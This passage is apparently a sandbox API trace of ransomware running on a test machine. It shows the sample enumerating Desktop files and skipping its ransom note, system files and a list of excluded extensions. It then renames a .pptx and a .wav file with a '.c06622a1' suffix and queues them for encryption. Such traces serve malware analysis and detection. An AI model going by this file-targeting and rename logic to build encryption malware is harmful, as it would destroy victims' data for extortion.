(_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\") returned 0x48 [0148.089] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe7ec) returned 0x2db87c0 [0148.089] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5077a0b0, ftCreationTime.dwHighDateTime=0x1d5dd5a, ftLastAccessTime.dwLowDateTime=0xd6e10260, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd6e10260, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.090] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75a1f6b0, ftCreationTime.dwHighDateTime=0x1d5d8fa, ftLastAccessTime.dwLowDateTime=0xcaaf0220, ftLastAccessTime.dwHighDateTime=0x1d5de4e, ftLastWriteTime.dwLowDateTime=0xcaaf0220, ftLastWriteTime.dwHighDateTime=0x1d5de4e, nFileSizeHigh=0x0, nFileSizeLow=0xc712, dwReserved0=0x0, dwReserved1=0x0, cFileName="E7FRCe_0yFV.pptx", cAlternateFileName="E7FRCE~1.PPT")) returned 1 [0148.090] _wcsicmp (_Str1="E7FRCe_0yFV.pptx", _Str2="README.c06622a1.TXT") returned -13 [0148.090] wcsstr (_Str="E7FRCe_0yFV.pptx", _SubStr="README") returned 0x0 [0148.090] _wcsicmp (_Str1="autorun.inf", _Str2="E7FRCe_0yFV.pptx") returned -4 [0148.090] wcslen (_String="autorun.inf") returned 0xb [0148.090] _wcsicmp (_Str1="boot.ini", _Str2="E7FRCe_0yFV.pptx") returned -3 [0148.090] wcslen (_String="boot.ini") returned 0x8 [0148.090] _wcsicmp (_Str1="bootfont.bin", _Str2="E7FRCe_0yFV.pptx") returned -3 [0148.091] wcslen (_String="bootfont.bin") returned 0xc [0148.091] _wcsicmp (_Str1="bootsect.bak", _Str2="E7FRCe_0yFV.pptx") returned -3 [0148.091] wcslen (_String="bootsect.bak") returned 0xc [0148.091] _wcsicmp (_Str1="desktop.ini", _Str2="E7FRCe_0yFV.pptx") returned -1 [0148.091] wcslen (_String="desktop.ini") returned 0xb [0148.091] _wcsicmp (_Str1="iconcache.db", _Str2="E7FRCe_0yFV.pptx") returned 4 [0148.091] wcslen (_String="iconcache.db") returned 0xc [0148.091] _wcsicmp (_Str1="ntldr", _Str2="E7FRCe_0yFV.pptx") returned 9 [0148.091] wcslen (_String="ntldr") returned 0x5 [0148.091] _wcsicmp (_Str1="ntuser.dat", _Str2="E7FRCe_0yFV.pptx") returned 9 [0148.091] wcslen (_String="ntuser.dat") returned 0xa [0148.091] _wcsicmp (_Str1="ntuser.dat.log", _Str2="E7FRCe_0yFV.pptx") returned 9 [0148.091] wcslen (_String="ntuser.dat.log") returned 0xe [0148.091] _wcsicmp (_Str1="ntuser.ini", _Str2="E7FRCe_0yFV.pptx") returned 9 [0148.091] wcslen (_String="ntuser.ini") returned 0xa [0148.091] _wcsicmp (_Str1="thumbs.db", _Str2="E7FRCe_0yFV.pptx") returned 15 [0148.091] wcslen (_String="thumbs.db") returned 0x9 [0148.091] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0148.091] wcslen (_String="386") returned 0x3 [0148.091] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0148.091] wcslen (_String="adv") returned 0x3 [0148.091] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0148.091] wcslen (_String="ani") returned 0x3 [0148.091] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0148.091] wcslen (_String="bat") returned 0x3 [0148.091] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0148.091] wcslen (_String="bin") returned 0x3 [0148.091] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0148.091] wcslen (_String="cab") returned 0x3 [0148.091] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0148.091] wcslen (_String="cmd") returned 0x3 [0148.091] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0148.092] wcslen (_String="com") returned 0x3 [0148.092] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0148.092] wcslen (_String="cpl") returned 0x3 [0148.092] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0148.092] wcslen (_String="cur") returned 0x3 [0148.092] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0148.092] wcslen (_String="deskthemepack") returned 0xd [0148.092] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0148.092] wcslen (_String="diagcab") returned 0x7 [0148.092] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0148.092] wcslen (_String="diagcfg") returned 0x7 [0148.092] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0148.092] wcslen (_String="diagpkg") returned 0x7 [0148.092] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0148.092] wcslen (_String="dll") returned 0x3 [0148.092] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0148.092] wcslen (_String="drv") returned 0x3 [0148.092] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0148.092] wcslen (_String="exe") returned 0x3 [0148.092] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0148.092] wcslen (_String="hlp") returned 0x3 [0148.092] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0148.092] wcslen (_String="icl") returned 0x3 [0148.092] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0148.092] wcslen (_String="icns") returned 0x4 [0148.092] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0148.092] wcslen (_String="ico") returned 0x3 [0148.092] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0148.092] wcslen (_String="ics") returned 0x3 [0148.092] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0148.092] wcslen (_String="idx") returned 0x3 [0148.092] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0148.092] wcslen (_String="ldf") returned 0x3 [0148.092] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0148.093] wcslen (_String="lnk") returned 0x3 [0148.093] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0148.093] wcslen (_String="mod") returned 0x3 [0148.093] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0148.093] wcslen (_String="mpa") returned 0x3 [0148.093] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0148.093] wcslen (_String="msc") returned 0x3 [0148.093] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0148.093] wcslen (_String="msp") returned 0x3 [0148.093] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0148.093] wcslen (_String="msstyles") returned 0x8 [0148.093] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0148.093] wcslen (_String="msu") returned 0x3 [0148.093] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0148.093] wcslen (_String="nls") returned 0x3 [0148.093] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0148.093] wcslen (_String="nomedia") returned 0x7 [0148.093] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0148.093] wcslen (_String="ocx") returned 0x3 [0148.093] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0148.093] wcslen (_String="prf") returned 0x3 [0148.093] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0148.093] wcslen (_String="ps1") returned 0x3 [0148.093] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0148.093] wcslen (_String="rom") returned 0x3 [0148.093] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0148.093] wcslen (_String="rtp") returned 0x3 [0148.093] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0148.093] wcslen (_String="scr") returned 0x3 [0148.093] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0148.093] wcslen (_String="shs") returned 0x3 [0148.093] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0148.093] wcslen (_String="spl") returned 0x3 [0148.093] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0148.094] wcslen (_String="sys") returned 0x3 [0148.094] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0148.094] wcslen (_String="theme") returned 0x5 [0148.094] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0148.094] wcslen (_String="themepack") returned 0x9 [0148.094] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0148.094] wcslen (_String="wpx") returned 0x3 [0148.094] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0148.094] wcslen (_String="lock") returned 0x4 [0148.094] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0148.094] wcslen (_String="key") returned 0x3 [0148.094] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0148.094] wcslen (_String="hta") returned 0x3 [0148.094] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0148.094] wcslen (_String="msi") returned 0x3 [0148.094] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0148.094] wcslen (_String="pdb") returned 0x3 [0148.094] _wcsicmp (_Str1="sql", _Str2="pptx") returned 3 [0148.094] wcslen (_String="sql") returned 0x3 [0148.094] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0148.094] wcslen (_String="sqlite") returned 0x6 [0148.094] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc")) returned 0x10 [0148.094] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0148.095] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc" [0148.095] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc") returned 0x47 [0148.095] wcscpy (in: _Dest=0x4530138, _Source="E7FRCe_0yFV.pptx" | out: _Dest="E7FRCe_0yFV.pptx") returned="E7FRCe_0yFV.pptx" [0148.095] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\E7FRCe_0yFV.pptx", dwFileAttributes=0x80) returned 1 [0148.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\E7FRCe_0yFV.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc\\e7frce_0yfv.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x660 [0148.095] SetFilePointerEx (in: hFile=0x660, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.095] ReadFile (in: hFile=0x660, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0148.096] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x3e187e5a [0148.096] RtlComputeCrc32 (PartialCrc=0x7e5a, Buffer=0x3fe674, Length=0x80) returned 0x63ab8afd [0148.096] RtlComputeCrc32 (PartialCrc=0x8afd, Buffer=0x3fe674, Length=0x80) returned 0x754f417c [0148.096] RtlComputeCrc32 (PartialCrc=0x417c, Buffer=0x3fe674, Length=0x80) returned 0x5f315676 [0148.096] RtlComputeCrc32 (PartialCrc=0x5676, Buffer=0x3fe674, Length=0x80) returned 0x42413ec2 [0148.096] CloseHandle (hObject=0x660) returned 1 [0148.096] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0148.096] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\E7FRCe_0yFV.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\E7FRCe_0yFV.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\E7FRCe_0yFV.pptx" [0148.096] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\E7FRCe_0yFV.pptx") returned 0x58 [0148.096] wcscpy (in: _Dest=0x4540160, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.096] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\E7FRCe_0yFV.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc\\e7frce_0yfv.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\E7FRCe_0yFV.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc\\e7frce_0yfv.pptx.c06622a1"), dwFlags=0x8) returned 1 [0148.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\E7FRCe_0yFV.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc\\e7frce_0yfv.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x660 [0148.100] CreateIoCompletionPort (FileHandle=0x660, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.100] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0148.106] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x209ac356 [0148.106] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4f86e383 [0148.106] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4ca3f8ec [0148.106] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x47e1c822 [0148.106] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x18a3f41f [0148.106] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2fb287c3 [0148.106] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2cc2e431 [0148.106] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x689c71e9 [0148.109] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0x94420535 [0148.109] RtlComputeCrc32 (PartialCrc=0x535, Buffer=0x41f0094, Length=0x80) returned 0xcd9bde91 [0148.109] RtlComputeCrc32 (PartialCrc=0xde91, Buffer=0x41f0094, Length=0x80) returned 0x8cd01302 [0148.109] RtlComputeCrc32 (PartialCrc=0x1302, Buffer=0x41f0094, Length=0x80) returned 0x129b6b81 [0148.110] RtlComputeCrc32 (PartialCrc=0x6b81, Buffer=0x41f0094, Length=0x80) returned 0xcdeabd95 [0148.110] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0148.110] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0148.110] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0148.110] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6e10260, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd6e10260, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd6e10260, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0148.110] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0148.110] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1b397d0, ftCreationTime.dwHighDateTime=0x1d5e0bc, ftLastAccessTime.dwLowDateTime=0xc141a780, ftLastAccessTime.dwHighDateTime=0x1d5e4fa, ftLastWriteTime.dwLowDateTime=0xc141a780, ftLastWriteTime.dwHighDateTime=0x1d5e4fa, nFileSizeHigh=0x0, nFileSizeLow=0xd578, dwReserved0=0x0, dwReserved1=0x0, cFileName="YWEGeiy Lucr J4gfrt.wav", cAlternateFileName="YWEGEI~1.WAV")) returned 1 [0148.110] _wcsicmp (_Str1="YWEGeiy Lucr J4gfrt.wav", _Str2="README.c06622a1.TXT") returned 7 [0148.110] wcsstr (_Str="YWEGeiy Lucr J4gfrt.wav", _SubStr="README") returned 0x0 [0148.110] _wcsicmp (_Str1="autorun.inf", _Str2="YWEGeiy Lucr J4gfrt.wav") returned -24 [0148.110] wcslen (_String="autorun.inf") returned 0xb [0148.110] _wcsicmp (_Str1="boot.ini", _Str2="YWEGeiy Lucr J4gfrt.wav") returned -23 [0148.110] wcslen (_String="boot.ini") returned 0x8 [0148.110] _wcsicmp (_Str1="bootfont.bin", _Str2="YWEGeiy Lucr J4gfrt.wav") returned -23 [0148.110] wcslen (_String="bootfont.bin") returned 0xc [0148.110] _wcsicmp (_Str1="bootsect.bak", _Str2="YWEGeiy Lucr J4gfrt.wav") returned -23 [0148.110] wcslen (_String="bootsect.bak") returned 0xc [0148.110] _wcsicmp (_Str1="desktop.ini", _Str2="YWEGeiy Lucr J4gfrt.wav") returned -21 [0148.110] wcslen (_String="desktop.ini") returned 0xb [0148.110] _wcsicmp (_Str1="iconcache.db", _Str2="YWEGeiy Lucr J4gfrt.wav") returned -16 [0148.110] wcslen (_String="iconcache.db") returned 0xc [0148.110] _wcsicmp (_Str1="ntldr", _Str2="YWEGeiy Lucr J4gfrt.wav") returned -11 [0148.110] wcslen (_String="ntldr") returned 0x5 [0148.110] _wcsicmp (_Str1="ntuser.dat", _Str2="YWEGeiy Lucr J4gfrt.wav") returned -11 [0148.110] wcslen (_String="ntuser.dat") returned 0xa [0148.110] _wcsicmp (_Str1="ntuser.dat.log", _Str2="YWEGeiy Lucr J4gfrt.wav") returned -11 [0148.110] wcslen (_String="ntuser.dat.log") returned 0xe [0148.110] _wcsicmp (_Str1="ntuser.ini", _Str2="YWEGeiy Lucr J4gfrt.wav") returned -11 [0148.110] wcslen (_String="ntuser.ini") returned 0xa [0148.110] _wcsicmp (_Str1="thumbs.db", _Str2="YWEGeiy Lucr J4gfrt.wav") returned -5 [0148.110] wcslen (_String="thumbs.db") returned 0x9 [0148.110] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0148.110] wcslen (_String="386") returned 0x3 [0148.111] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0148.111] wcslen (_String="adv") returned 0x3 [0148.111] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0148.111] wcslen (_String="ani") returned 0x3 [0148.111] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0148.111] wcslen (_String="bat") returned 0x3 [0148.111] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0148.111] wcslen (_String="bin") returned 0x3 [0148.111] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0148.111] wcslen (_String="cab") returned 0x3 [0148.111] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0148.111] wcslen (_String="cmd") returned 0x3 [0148.111] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0148.111] wcslen (_String="com") returned 0x3 [0148.111] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0148.111] wcslen (_String="cpl") returned 0x3 [0148.111] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0148.111] wcslen (_String="cur") returned 0x3 [0148.111] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0148.111] wcslen (_String="deskthemepack") returned 0xd [0148.111] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0148.111] wcslen (_String="diagcab") returned 0x7 [0148.111] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0148.111] wcslen (_String="diagcfg") returned 0x7 [0148.111] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0148.111] wcslen (_String="diagpkg") returned 0x7 [0148.111] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0148.111] wcslen (_String="dll") returned 0x3 [0148.111] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0148.111] wcslen (_String="drv") returned 0x3 [0148.111] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0148.111] wcslen (_String="exe") returned 0x3 [0148.111] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0148.111] wcslen (_String="hlp") returned 0x3 [0148.111] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0148.111] wcslen (_String="icl") returned 0x3 [0148.111] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0148.111] wcslen (_String="icns") returned 0x4 [0148.111] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0148.112] wcslen (_String="ico") returned 0x3 [0148.112] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0148.112] wcslen (_String="ics") returned 0x3 [0148.112] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0148.112] wcslen (_String="idx") returned 0x3 [0148.112] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0148.112] wcslen (_String="ldf") returned 0x3 [0148.112] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0148.112] wcslen (_String="lnk") returned 0x3 [0148.112] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0148.112] wcslen (_String="mod") returned 0x3 [0148.112] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0148.112] wcslen (_String="mpa") returned 0x3 [0148.112] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0148.112] wcslen (_String="msc") returned 0x3 [0148.112] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0148.112] wcslen (_String="msp") returned 0x3 [0148.112] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0148.112] wcslen (_String="msstyles") returned 0x8 [0148.112] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0148.112] wcslen (_String="msu") returned 0x3 [0148.112] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0148.112] wcslen (_String="nls") returned 0x3 [0148.112] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0148.112] wcslen (_String="nomedia") returned 0x7 [0148.112] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0148.112] wcslen (_String="ocx") returned 0x3 [0148.112] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0148.112] wcslen (_String="prf") returned 0x3 [0148.112] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0148.112] wcslen (_String="ps1") returned 0x3 [0148.112] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0148.112] wcslen (_String="rom") returned 0x3 [0148.112] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0148.112] wcslen (_String="rtp") returned 0x3 [0148.112] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0148.112] wcslen (_String="scr") returned 0x3 [0148.112] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0148.113] wcslen (_String="shs") returned 0x3 [0148.113] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0148.113] wcslen (_String="spl") returned 0x3 [0148.113] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0148.113] wcslen (_String="sys") returned 0x3 [0148.113] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0148.113] wcslen (_String="theme") returned 0x5 [0148.113] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0148.113] wcslen (_String="themepack") returned 0x9 [0148.113] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0148.113] wcslen (_String="wpx") returned 0x3 [0148.113] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0148.113] wcslen (_String="lock") returned 0x4 [0148.113] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0148.113] wcslen (_String="key") returned 0x3 [0148.113] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0148.113] wcslen (_String="hta") returned 0x3 [0148.113] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0148.113] wcslen (_String="msi") returned 0x3 [0148.113] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0148.113] wcslen (_String="pdb") returned 0x3 [0148.113] _wcsicmp (_Str1="sql", _Str2="wav") returned -4 [0148.113] wcslen (_String="sql") returned 0x3 [0148.113] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0148.113] wcslen (_String="sqlite") returned 0x6 [0148.113] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc")) returned 0x10 [0148.113] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0148.113] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc" [0148.113] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc") returned 0x47 [0148.113] wcscpy (in: _Dest=0x4530138, _Source="YWEGeiy Lucr J4gfrt.wav" | out: _Dest="YWEGeiy Lucr J4gfrt.wav") returned="YWEGeiy Lucr J4gfrt.wav" [0148.113] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\YWEGeiy Lucr J4gfrt.wav", dwFileAttributes=0x80) returned 1 [0148.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\YWEGeiy Lucr J4gfrt.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc\\ywegeiy lucr j4gfrt.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0148.114] SetFilePointerEx (in: 